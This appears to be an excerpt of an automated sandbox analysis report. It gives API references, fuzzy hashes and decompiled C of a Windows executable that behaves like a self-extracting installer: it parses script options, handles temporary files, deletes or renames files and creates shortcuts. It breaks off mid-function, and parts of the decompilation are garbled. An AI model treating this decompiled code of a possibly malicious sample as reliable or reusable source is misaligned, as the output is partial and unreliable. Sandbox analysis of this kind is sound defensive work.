0x01028fe1
0x0102901c
0x0102901d
0x01029023
0x01029028
0x0102902b
0x0102902c
0x0102902d
0x01029034
0x01029036
0x01029038
0x0102903d
0x01029040
0x0102904e
0x0102905a
0x0102905d
0x01029060
0x01029072
0x01029077
0x01029079
0x01029084
0x0102908a
0x01029092
0x01029094
0x00000000
0x00000000
0x00000000
0x00000000
0x0102907b
0x0102907b
0x00000000
0x0102907b
0x01029062
0x01029062
0x01029063
0x01029063
0x01029096
0x01029097
0x01029097
0x01029042
0x01029048
0x0102904c
0x0102909f
0x010290a0
0x010290a6
0x00000000
0x00000000
0x00000000
0x0102904c
0x010290ad
0x010290ad
0x01028fbb
0x01028fc1
0x01028fc5
0x01029010
0x01029011
0x0102901b
0x00000000
0x00000000
0x00000000
0x01028fc5

APIs

GetLastError.KERNEL32(?,01040EE8,01023E14,01040EE8,?,?,01023713,00000050,?,01040EE8,00000200), ref: 01028FA9
_free.LIBCMT ref: 01028FDC
_free.LIBCMT ref: 01029004
SetLastError.KERNEL32(00000000,?,01040EE8,00000200), ref: 01029011
SetLastError.KERNEL32(00000000,?,01040EE8,00000200), ref: 0102901D
_abort.LIBCMT ref: 01029023

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 64b0bad63f53e8fcb27b4dd5d9a9c5af59a63aa49c90c6790817238ac5be1e97
Instruction ID: adfd5b48aa4bc0e9d6d764b8d4734cbb1315233b5c6f29190bccc19fee8fe3d4
Opcode Fuzzy Hash: 64b0bad63f53e8fcb27b4dd5d9a9c5af59a63aa49c90c6790817238ac5be1e97
Instruction Fuzzy Hash: D9F028395046326BD672322C6C48FAB2ADE9BD4764F20811AF6D8E7286EF39C8015210

Uniqueness

Uniqueness Score: -1.00%

Function 0101D2E6, Relevance: 9.0, APIs: 6, Instructions: 43
windowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101D2E6(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}

0x0101d2f2
0x0101d2ff
0x0101d304
0x0101d314
0x0101d31d
0x0101d327
0x0101d331
0x0101d331
0x0101d33c
0x0101d342
0x00000000
0x0101d346
0x0101d34b

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101D31D
TranslateMessage.USER32(?), ref: 0101D327
DispatchMessageW.USER32(?), ref: 0101D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101D33C

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 696757fff57e14849720b67452f0873c60c2695185cf7e155c30d7281a5fe14c
Instruction ID: d964146661a7d92e9e29fe7be6419d6b862202f0ab3a1d382ce5e8e8f6b34ade
Opcode Fuzzy Hash: 696757fff57e14849720b67452f0873c60c2695185cf7e155c30d7281a5fe14c
Instruction Fuzzy Hash: B5F03C72A01119BBDB315AE5DC4CEDBBF6EEF41391F008412F686D2059D63A8141C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0101C40E, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0101C40E(void* __ecx, void* __edx, void* __esi) {
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t275;
				void* _t288;
				signed int _t291;
				void* _t294;
				void* _t295;
				signed int _t296;
				void* _t300;

				L0:
				while(1) {
					L0:
					_t294 = __esi;
					_t288 = __edx;
					 *0x105ec98 = 1;
					_t275 = _t300 - 0x3508;
					if( *((short*)(_t300 - 0x3508)) != 0x3c) {
						goto L96;
					}
					L86:
					__eax = __ebp - 0x3506;
					_push(__ebp - 0x3506);
					__eax = E010215E8(__ecx);
					_pop(__ecx);
					__ecx = 0x3e;
					if(__eax == 0) {
						goto L96;
					}
					L87:
					_t101 = __eax + 2; // 0x2
					__ecx = _t101;
					 *(__ebp - 0x14) = _t101;
					__ecx = 0;
					 *__eax = __cx;
					__eax = __ebp - 0x108;
					_push(0x64);
					_push(__ebp - 0x108);
					__eax = __ebp - 0x3506;
					_push(__ebp - 0x3506);
					while(1) {
						L88:
						__ebx = E0101A6C7();
						if(__ebx == 0) {
							break;
						}
						L89:
						if( *(__ebp - 0x108) == 0) {
							break;
						}
						L90:
						__eax = __ebp - 0x108;
						__eax = E010117AC(__ebp - 0x108, L"HIDE");
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__edi = __edi & __eax;
						__eax = __ebp - 0x108;
						__eax = E010117AC(__ebp - 0x108, L"MAX");
						if(__eax == 0) {
							__edi = 3;
						}
						__eax = __ebp - 0x108;
						__eax = E010117AC(__ebp - 0x108, L"MIN");
						if(__eax == 0) {
							__edi = 6;
						}
						_push(0x64);
						__eax = __ebp - 0x108;
						_push(__ebp - 0x108);
						_push(__ebx);
					}
					L95:
					__ebx =  *(__ebp - 0x14);
					L96:
					if( *((intOrPtr*)(_t300 + 0x10)) != 5) {
						L99:
						if( *((intOrPtr*)(_t300 + 0x10)) == 4) {
							if(_t294 == 6) {
								E0101CE22(_t300,  *((intOrPtr*)(_t300 + 8)), _t275, 1, 0);
							}
						}
						while(1) {
							L172:
							_push(0x1000);
							_t208 = _t300 - 0x15; // 0xffffcae3
							_t209 = _t300 - 0xd; // 0xffffcaeb
							_t210 = _t300 - 0x3508; // 0xffff95f0
							_t211 = _t300 - 0xfd58; // 0xfffecda0
							_push( *((intOrPtr*)(_t300 + 0xc)));
							_t220 = E0101AA36();
							_t275 =  *((intOrPtr*)(_t300 + 0x10));
							 *((intOrPtr*)(_t300 + 0xc)) = _t220;
							if(_t220 != 0) {
								_t221 = _t300 - 0x3508;
								_t295 = _t300 - 0x1bd58;
								_t291 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E010117AC(_t300 - 0xfd58,  *((intOrPtr*)(0x103e618 + _t296 * 4))) != 0) {
								_t296 = _t296 + 1;
								if(_t296 < 0xe) {
									continue;
								} else {
									goto L172;
								}
							}
							if(_t296 > 0xd) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t296 * 4 +  &M0101CAA1))) {
								case 0:
									L9:
									__eflags = _t275 - 2;
									if(_t275 == 2) {
										E01019DA4(_t300 - 0x7d50, 0x800);
										E0100A49D(E0100B965(_t300 - 0x7d50, _t300 - 0x3508, _t300 - 0xdd58, 0x800), _t275, _t300 - 0x8d58, _t296);
										 *(_t300 - 4) = 0;
										E0100A5D7(_t300 - 0x8d58, _t300 - 0xdd58);
										E010070BF(_t300 - 0x5d50);
										while(1) {
											L23:
											_push(0);
											_t283 = _t300 - 0x8d58;
											_t235 = E0100A52A(_t300 - 0x8d58, _t288, _t300 - 0x5d50);
											__eflags = _t235;
											if(_t235 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t300 - 0x5d50, 0);
											__eflags =  *(_t300 - 0x4d44);
											if(__eflags == 0) {
												L16:
												_t239 = GetFileAttributesW(_t300 - 0x5d50);
												__eflags = _t239 - 0xffffffff;
												if(_t239 == 0xffffffff) {
													continue;
												}
												L17:
												_t241 = DeleteFileW(_t300 - 0x5d50);
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													_t298 = 0;
													_push(0);
													goto L20;
													L20:
													E0100400A(_t300 - 0x1108, 0x800, L"%s.%d.tmp", _t300 - 0x5d50);
													_t302 = _t302 + 0x14;
													_t246 = GetFileAttributesW(_t300 - 0x1108);
													__eflags = _t246 - 0xffffffff;
													if(_t246 != 0xffffffff) {
														_t298 = _t298 + 1;
														__eflags = _t298;
														_push(_t298);
														goto L20;
													} else {
														_t249 = MoveFileW(_t300 - 0x5d50, _t300 - 0x1108);
														__eflags = _t249;
														if(_t249 != 0) {
															MoveFileExW(_t300 - 0x1108, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E0100B4F7(_t283, __eflags, _t300 - 0x7d50, _t300 - 0x1108, 0x800);
											E0100B207(__eflags, _t300 - 0x1108, 0x800);
											_t299 = E010235B3(_t300 - 0x7d50);
											__eflags = _t299 - 4;
											if(_t299 < 4) {
												L14:
												_t260 = E0100B925(_t300 - 0x3508);
												__eflags = _t260;
												if(_t260 != 0) {
													break;
												}
												L15:
												_t263 = E010235B3(_t300 - 0x5d50);
												__eflags = 0;
												 *((short*)(_t300 + _t263 * 2 - 0x5d4e)) = 0;
												E0101F350(0x800, _t300 - 0x40, 0, 0x1e);
												_t302 = _t302 + 0x10;
												 *((intOrPtr*)(_t300 - 0x3c)) = 3;
												_push(0x14);
												_pop(_t266);
												 *((short*)(_t300 - 0x30)) = _t266;
												 *((intOrPtr*)(_t300 - 0x38)) = _t300 - 0x5d50;
												_push(_t300 - 0x40);
												 *0x1062074();
												goto L16;
											}
											L13:
											_t271 = E010235B3(_t300 - 0x1108);
											__eflags = _t299 - _t271;
											if(_t299 > _t271) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
										E0100A4B3(_t300 - 0x8d58);
									}
									goto L172;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E010235B3(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0x105dc84);
										__eax = E010235DE(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											__eax = E01027168(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L010235CE(__esi);
										}
									}
									goto L172;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x3508 = SetWindowTextW( *(__ebp + 8), __ebp - 0x3508);
									}
									goto L172;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L172;
									}
									L42:
									__eflags =  *0x104a472 - __di;
									if( *0x104a472 != __di) {
										goto L172;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x3508;
									_push(0x22);
									 *(__ebp - 0x1108) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x3508) - __ax;
									if( *(__ebp - 0x3508) == __ax) {
										__edi = __ebp - 0x3506;
									}
									__eax = E010235B3(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L172;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1108 = E0100FE56(__ebp - 0x1108, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1108;
												__eax = E010217CB(__ebp - 0x1108, __ebp - 0x1108);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1108;
												__edi = 0x104a472;
												E0100FE56(0x104a472, __ebp - 0x1108, __esi) = __ebp - 0x1108;
												__eax = E0101A8D0(__ebp - 0x1108, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1108 = SetWindowTextW(__esi, __ebp - 0x1108); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0x104a472); // executed
												__eax = __ebp - 0x1108;
												__eax = E010235E9(__ebp - 0x1108, 0x104a472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1108 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1108);
												}
												goto L172;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0x1062028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1108;
													_push(__ebp - 0x1108);
													__eax = __ebp - 0x20;
													_push(__ebp - 0x20);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0x1062024();
													_push( *(__ebp - 0x1c));
													 *0x1062004() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *(__ebp + __eax * 2 - 0x1108) = __cx;
												}
												__eflags =  *(__ebp - 0x1108) - __bx;
												if( *(__ebp - 0x1108) != __bx) {
													__eax = __ebp - 0x1108;
													__eax = E010235B3(__ebp - 0x1108);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1108 = E0100FE2E(__eflags, __ebp - 0x1108, "\\", __esi);
													}
												}
												__esi = E010235B3(__edi);
												__eax = __ebp - 0x1108;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1108 = E0100FE2E(__eflags, __ebp - 0x1108, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L50;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L172;
										} else {
											__ebp - 0x1108 = E0100FE56(__ebp - 0x1108, __edi, 0x800);
											goto L63;
										}
									}
								case 4:
									L68:
									__eflags =  *0x104a46c - 1;
									__eflags = __eax - 0x104a46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *__edi & __cl;
									_pop(es);
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0x1048453 = __cl;
										 *0x1048460 = 1;
										goto L172;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0x1048453 = __cl;
										L79:
										 *0x1048460 = __cl;
										goto L172;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L172;
									}
									L77:
									 *0x1048453 = 1;
									goto L79;
								case 6:
									goto L0;
								case 7:
									L105:
									__eflags = __ebx - 1;
									if(__eflags != 0) {
										L122:
										__eflags = __ebx - 7;
										if(__ebx == 7) {
											__eflags =  *0x104a46c;
											if( *0x104a46c == 0) {
												 *0x104a46c = 2;
											}
											 *0x1049468 = 1;
										}
										goto L172;
									}
									L106:
									__eax = __ebp - 0x7d50;
									__edi = 0x800;
									GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
									E0100B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
									__esi = 0;
									_push(0);
									while(1) {
										L108:
										_push( *0x103e5f8);
										__ebp - 0x7d50 = E0100400A(0x104946a, __edi, L"%s%s%u", __ebp - 0x7d50);
										__eax = E0100A180(0x104946a);
										__eflags = __al;
										if(__al == 0) {
											break;
										}
										L107:
										__esi =  &(__esi->i);
										__eflags = __esi;
										_push(__esi);
									}
									L109:
									__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x104946a);
									__eflags =  *(__ebp - 0x3508);
									if( *(__ebp - 0x3508) == 0) {
										goto L172;
									}
									L110:
									__eflags =  *0x1056b7a;
									if( *0x1056b7a != 0) {
										goto L172;
									}
									L111:
									__eax = 0;
									 *(__ebp - 0x1508) = __ax;
									__eax = __ebp - 0x3508;
									_push(0x2c);
									_push(__ebp - 0x3508);
									__eax = E010215E8(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax != 0) {
										L118:
										__eflags =  *(__ebp - 0x1508);
										if( *(__ebp - 0x1508) == 0) {
											__ebp - 0x1bd58 = __ebp - 0x3508;
											E0100FE56(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
											__ebp - 0x1508 = E0100FE56(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
										}
										__ebp - 0x3508 = E0101A4F2(__ebp - 0x3508);
										__eax = 0;
										 *(__ebp - 0x2508) = __ax;
										__ebp - 0x1508 = __ebp - 0x3508;
										__eax = E01019F35( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
										__eflags = __eax - 6;
										if(__eax == 6) {
											goto L172;
										} else {
											L121:
											__eax = 0;
											__eflags = 0;
											 *0x1048450 = 1;
											 *0x104946a = __ax;
											__eax = EndDialog( *(__ebp + 8), 1);
											goto L122;
										}
									}
									L112:
									__edx = 0;
									__esi = 0;
									__eflags =  *(__ebp - 0x3508) - __dx;
									if( *(__ebp - 0x3508) == __dx) {
										goto L118;
									}
									L113:
									__ecx = 0;
									__eax = __ebp - 0x3508;
									while(1) {
										L114:
										__eflags =  *__eax - 0x40;
										if( *__eax == 0x40) {
											break;
										}
										L115:
										__esi =  &(__esi->i);
										__eax = __ebp - 0x3508;
										__ecx = __esi + __esi;
										__eax = __ebp - 0x3508 + __ecx;
										__eflags =  *__eax - __dx;
										if( *__eax != __dx) {
											continue;
										}
										L116:
										goto L118;
									}
									L117:
									__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
									__ebp - 0x1508 = E0100FE56(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
									__eax = 0;
									__eflags = 0;
									 *(__ebp + __esi * 2 - 0x3508) = __ax;
									goto L118;
								case 8:
									L126:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x3508) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x3508;
											_push(__ebp - 0x3508);
											__eax = E01027107(__ebx, __edi);
											_pop(__ecx);
											 *0x105ec94 = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0x105ec90 = E0101AB9A(__ecx, __edx, __eflags);
									}
									 *0x1056b7b = 1;
									goto L172;
								case 9:
									L131:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L172;
									}
									L132:
									__eax = 0;
									 *(__ebp - 0x4d08) = __ax;
									__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
									__eax = E01026420( *(__ebp - 0x1bd58) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0x105bb82);
										__eax = __ebp - 0x4d08;
										_push(__ebp - 0x4d08);
										__eax = E0100FE56();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x4d08;
										if(__eflags == 0) {
											_push(0x105ab82);
											_push(__eax);
											__eax = E0100FE56();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0x105cb82);
											_push(__eax);
											__eax = E0100FE56();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9d58) = __ax;
									 *(__ebp - 0x3d08) = __ax;
									__ebp - 0x19d58 = __ebp - 0x6d50;
									__eax = E010257E6(__ebp - 0x6d50, __ebp - 0x19d58);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) != __bx) {
										L140:
										__ebp - 0x6d50 = E0100A180(__ebp - 0x6d50);
										__eflags = __al;
										if(__al != 0) {
											goto L157;
										}
										L141:
										__ebx = __edi;
										__esi = __ebp - 0x6d50;
										__eflags =  *(__ebp - 0x6d50) - __bx;
										if( *(__ebp - 0x6d50) == __bx) {
											goto L157;
										}
										L142:
										_push(0x20);
										_pop(__ecx);
										do {
											L143:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L145:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6d50 = E0100A180(__ebp - 0x6d50);
												__eflags = __al;
												if(__al == 0) {
													L152:
													__esi->i = __di;
													L153:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L154;
												}
												L146:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L148:
													_push(0x20);
													_pop(__eax);
													do {
														L149:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x3d08;
													L151:
													_push(__eax);
													__eax = E010257E6();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L153;
												}
												L147:
												 *(__ebp - 0x3d08) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x3d06;
												goto L151;
											}
											L144:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L154;
											}
											goto L145;
											L154:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L157;
									} else {
										L138:
										__ebp - 0x19d56 = __ebp - 0x6d50;
										E010257E6(__ebp - 0x6d50, __ebp - 0x19d56) = __ebp - 0x6d4e;
										_push(__ebx);
										_push(__ebp - 0x6d4e);
										__eax = E010215E8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x3d08 = E010257E6(__ebp - 0x3d08, __ebp - 0x3d08);
											_pop(__ecx);
											_pop(__ecx);
										}
										L157:
										__eflags =  *((short*)(__ebp - 0x11d58));
										__ebx = 0x800;
										if( *((short*)(__ebp - 0x11d58)) != 0) {
											__ebp - 0x9d58 = __ebp - 0x11d58;
											__eax = E0100B239(__ebp - 0x11d58, __ebp - 0x9d58, 0x800);
										}
										__ebp - 0xbd58 = __ebp - 0x6d50;
										__eax = E0100B239(__ebp - 0x6d50, __ebp - 0xbd58, __ebx);
										__eflags =  *(__ebp - 0x4d08);
										if(__eflags == 0) {
											__ebp - 0x4d08 = E0101AB2E(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
										}
										__ebp - 0x4d08 = E0100B207(__eflags, __ebp - 0x4d08, __ebx);
										__eflags =  *((short*)(__ebp - 0x17d58));
										if(__eflags != 0) {
											__ebp - 0x17d58 = __ebp - 0x4d08;
											E0100FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __ebx) = __ebp - 0x4d08;
											__eax = E0100B207(__eflags, __ebp - 0x4d08, __ebx);
										}
										__ebp - 0x4d08 = __ebp - 0xcd58;
										__eax = E010257E6(__ebp - 0xcd58, __ebp - 0x4d08);
										__eflags =  *(__ebp - 0x13d58);
										__eax = __ebp - 0x13d58;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19d58;
										}
										__ebp - 0x4d08 = E0100FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __ebx);
										__eax = __ebp - 0x4d08;
										__eflags = E0100B493(__ebp - 0x4d08);
										if(__eflags == 0) {
											L167:
											__ebp - 0x4d08 = E0100FE2E(__eflags, __ebp - 0x4d08, L".lnk", __ebx);
											goto L168;
										} else {
											L166:
											__eflags = __eax;
											if(__eflags == 0) {
												L168:
												_push(1);
												__eax = __ebp - 0x4d08;
												_push(__ebp - 0x4d08);
												E0100A04F(__ecx, __ebp) = __ebp - 0xbd58;
												__ebp - 0xad58 = E010257E6(__ebp - 0xad58, __ebp - 0xbd58);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xad58 = E0100BCCF(__eflags, __ebp - 0xad58);
												__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
												__eax = __ebp - 0x3d08;
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
												__edx = __ebp - 0x9d58;
												__esi = __ebp - 0xad58;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
												 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
												 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
												__eax = __ebp - 0x15d58;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
												E0101A5E4(__ebp - 0x15d58) = __ebp - 0x4d08;
												__ebp - 0xbd58 = E01019BDC(__ecx, __edi, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
												__eflags =  *(__ebp - 0xcd58);
												if( *(__ebp - 0xcd58) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcd58;
													_push(__ebp - 0xcd58);
													_push(5);
													_push(0x1000);
													__eax =  *0x1062078();
												}
												goto L172;
											}
											goto L167;
										}
									}
								case 0xa:
									L170:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0x104a470 = 1;
									}
									goto L172;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eax = E01026420( *(__ebp - 0x3508) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0x1048461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0x1048462 = 1;
										} else {
											__eax = 0;
											 *0x1048461 = __al;
											 *0x1048462 = __al;
										}
									}
									goto L172;
								case 0xc:
									L102:
									 *0x105ec99 = 1;
									__eax = __eax + 0x105ec99;
									_t115 = __esi + 0x39;
									 *_t115 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t115;
									__ebp = 0xffffcaf8;
									if( *_t115 != 0) {
										_t117 = __ebp - 0x3508; // 0xffff95f0
										__eax = _t117;
										_push(_t117);
										 *0x103e5fc = E01011798();
									}
									goto L172;
							}
							L2:
							_push(0x1000);
							_push(_t295);
							_push(_t221);
							_t221 = E0101A6C7();
							_t295 = _t295 + 0x2000;
							_t291 = _t291 - 1;
							if(_t291 != 0) {
								goto L2;
							} else {
								_t296 = _t291;
								goto L4;
							}
						}
						L173:
						 *[fs:0x0] =  *((intOrPtr*)(_t300 - 0xc));
						return _t220;
					}
					L97:
